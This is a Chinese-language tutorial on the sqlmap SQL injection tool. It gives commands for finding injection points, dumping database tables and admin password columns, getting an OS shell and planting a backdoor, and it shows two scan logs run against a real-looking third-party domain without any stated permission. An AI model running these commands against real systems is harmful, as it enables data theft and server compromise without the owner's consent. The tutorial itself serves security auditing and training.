大家好,今天为大家分享一个无敌的 Python 库 - sqlmap。
Github地址:https://github.com/sqlmapproject/sqlmap
在网络安全领域,SQL注入仍然是最常见的攻击之一。sqlmap是一个开源的自动化SQL注入和数据库取证工具,它提供了广泛的功能来检测和利用SQL注入漏洞。本文将详细介绍sqlmap的安装、特性、基本与高级功能,并结合实际应用场景,展示其在网络安全测试中的应用。
安装
sqlmap是用Python编写的,可以通过克隆其GitHub仓库或使用pip安装:
pip install sqlmap或者:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev安装简便,使得用户可以快速开始他们的SQL注入测试工作。
特性
- 支持广泛的数据库系统:如MySQL, Oracle, PostgreSQL等。
- 自动检测注入点:自动化的方式检测SQL注入漏洞。
- 多种SQL注入技术:包括布尔盲注、时间盲注、错误注入等。
- 丰富的数据获取功能:能够获取数据库名称、表、列和对应数据。
基本功能
自动检测注入点
sqlmap能够自动识别SQL注入漏洞,这是其最基本的功能之一。用户只需提供一个可疑的URL,sqlmap便可以进行分析。
python sqlmap.py -u "https://mcs.zijieapi.com/list" --batch这个命令会自动测试URL中的参数id是否存在SQL注入漏洞。--batch参数用于自动化模式,避免在过程中进行交互。
输出结果:
___
__H__
___ ___[)]_____ ___ ___ {1.8.5.4#dev}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:29:48 /2024-05-13/
[10:29:48] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[10:29:48] [INFO] testing connection to the target URL
[10:29:49] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:29:49] [INFO] testing if the target URL content is stable
[10:29:49] [INFO] target URL content is stable
[10:29:49] [INFO] testing if URI parameter '#1*' is dynamic
[10:29:49] [INFO] heuristics detected web page charset 'utf-8'
[10:29:49] [WARNING] URI parameter '#1*' does not appear to be dynamic
[10:29:50] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[10:29:50] [INFO] testing for SQL injection on URI parameter '#1*'
[10:29:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:29:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:29:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:29:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:29:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:29:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:29:56] [INFO] testing 'Generic inline queries'
[10:29:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:29:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:29:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:29:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:30:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:30:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:30:02] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:30:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:30:04] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:30:05] [INFO] target URL appears to have 1 column in query
[10:30:05] [WARNING] applying generic concatenation (CONCAT)
[10:30:05] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[10:30:07] [WARNING] URI parameter '#1*' does not seem to be injectable
[10:30:07] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[10:30:07] [WARNING] HTTP error codes detected during run:
444 (?) - 88 times, 404 (Not Found) - 5 times
[*] ending @ 10:30:07 /2024-05-13/获取数据库信息
一旦检测到SQL注入漏洞,sqlmap可以被用来获取数据库的详细信息,如数据库类型、版本和结构。
python sqlmap.py -u "https://mcs.zijieapi.com/list" --batch --banner这个命令会输出数据库的版本和其他信息(如MySQL、Oracle、PostgreSQL的版本号)。
输出结果:
___
__H__
___ ___[(]_____ ___ ___ {1.8.5.4#dev}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:31:28 /2024-05-13/
[10:31:28] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[10:31:28] [INFO] testing connection to the target URL
[10:31:28] [INFO] testing if the target URL content is stable
[10:31:29] [INFO] target URL content is stable
[10:31:29] [INFO] testing if URI parameter '#1*' is dynamic
[10:31:29] [INFO] heuristics detected web page charset 'utf-8'
[10:31:29] [WARNING] URI parameter '#1*' does not appear to be dynamic
[10:31:29] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[10:31:29] [INFO] testing for SQL injection on URI parameter '#1*'
[10:31:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:31:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:31:32] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:31:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:31:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:31:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:31:36] [INFO] testing 'Generic inline queries'
[10:31:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:31:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:31:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:31:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:31:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:31:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:31:41] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:31:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:31:43] [WARNING] URI parameter '#1*' does not seem to be injectable
[10:31:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[10:31:43] [WARNING] HTTP error codes detected during run:
444 (?) - 71 times, 404 (Not Found) - 3 times
[*] ending @ 10:31:43 /2024-05-13/提取数据库数据
sqlmap可以用来提取数据库中的数据,包括表名、列名及具体数据。
sqlmap -u "http://example.com/page.php?id=1" --batch --dbs这个命令会列出所有可访问的数据库。
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname --tables这个命令会列出指定数据库dbname中的所有表。
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname -T tablename --columns这个命令会列出指定表tablename中的所有列。
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname -T tablename -C column1,column2 --dump这个命令会提取并显示指定表中指定列column1和column2的数据。
高级功能
操作系统级访问
sqlmap可以利用SQL注入漏洞获取操作系统级别的访问权限。这包括获取shell访问权限,甚至是完全控制受影响的服务器。
sqlmap -u "http://example.com/page.php?id=1" --os-shell这个命令尝试通过SQL注入漏洞获取一个操作系统的shell。它将利用数据库服务器的漏洞来执行操作系统命令。
数据库后门植入
sqlmap能够自动植入数据库后门,方便未来的访问。这是一种高级技术,通常用于渗透测试中。
sqlmap -u "http://example.com/page.php?id=1" --os-pwn这个命令会尝试利用SQL注入漏洞在目标数据库服务器上植入一个后门,这通常涉及到二进制文件的上传和执行。
时间盲注技术
时间盲注是一种在响应时间上操作的技术,sqlmap提供了自动化这一技术的功能。
sqlmap -u "http://example.com/page.php?id=1" --technique=T这个命令指定使用时间盲注技术进行测试。--technique参数可以用来指定使用哪种类型的SQL注入技术(B: Boolean-based blind, T: Time-based blind, E: Error-based, U: UNION query-based, S: Stacked queries)。
自定义注入点和数据提取
sqlmap允许用户定义具体的注入点,甚至自定义SQL查询来提取数据。
sqlmap -u "http://example.com/page.php?id=1" --dbms=MySQL --dump -T users -C name,password --where="role='admin'"这个命令指定从users表中提取name和password列,但仅限于那些role列为admin的行。
实际应用场景
网络安全审计
在网络安全审计中,sqlmap可以用来识别和报告Web应用中的SQL注入漏洞,帮助企业理解和修复潜在的安全风险。
sqlmap -u "http://example.com/page.php?id=1" --risk=3 --level=5 --batch这个命令配置sqlmap进行深入的安全测试,--risk 和 --level 参数提高测试的深度和广度,--batch用于自动处理提示信息。
渗透测试
在渗透测试中,测试者使用sqlmap来验证疑似的安全漏洞,并评估攻击者可能利用这些漏洞造成的损害。
sqlmap -u "http://example.com/page.php?id=1" --dbs --technique=U这个命令用于探测所有可访问的数据库,并且指定使用UNION查询技术,这是一种常用的SQL注入方法。
安全教育和培训
sqlmap也广泛用于教育和培训场景,帮助学习者理解SQL注入的原理和防护方法。
sqlmap -u "http://example.com/page.php?id=1" --banner这个简单的命令可以用来向学习者展示如何通过sqlmap获取数据库服务器的版本信息,作为入门级的演示。
自动化脚本
利用sqlmap的API,开发者可以编写自动化脚本来集成更复杂的安全测试工作流程。
import os
command = "sqlmap -u 'http://example.com/page.php?id=1' --batch --beep"
os.system(command)这个Python脚本使用sqlmap进行自动化测试,并在发现漏洞时发出警报。
总结
sqlmap是一个强大的自动化SQL注入工具,专为检测、利用和管理数据库的SQL注入漏洞设计。它支持广泛的数据库系统,能自动识别注入点,并通过多种技术执行详尽的数据库、表、数据提取。sqlmap的功能包括获取数据库版本信息、数据提取、访问底层文件系统和执行远程命令,甚至允许植入后门。该工具不仅适用于网络安全专家进行安全审计和渗透测试,也广泛用于安全教育和培训,帮助了解和防范SQL注入攻击。通过其命令行界面和API,sqlmap为自动化测试提供了极大的便利,是网络安全领域中不可或缺的工具。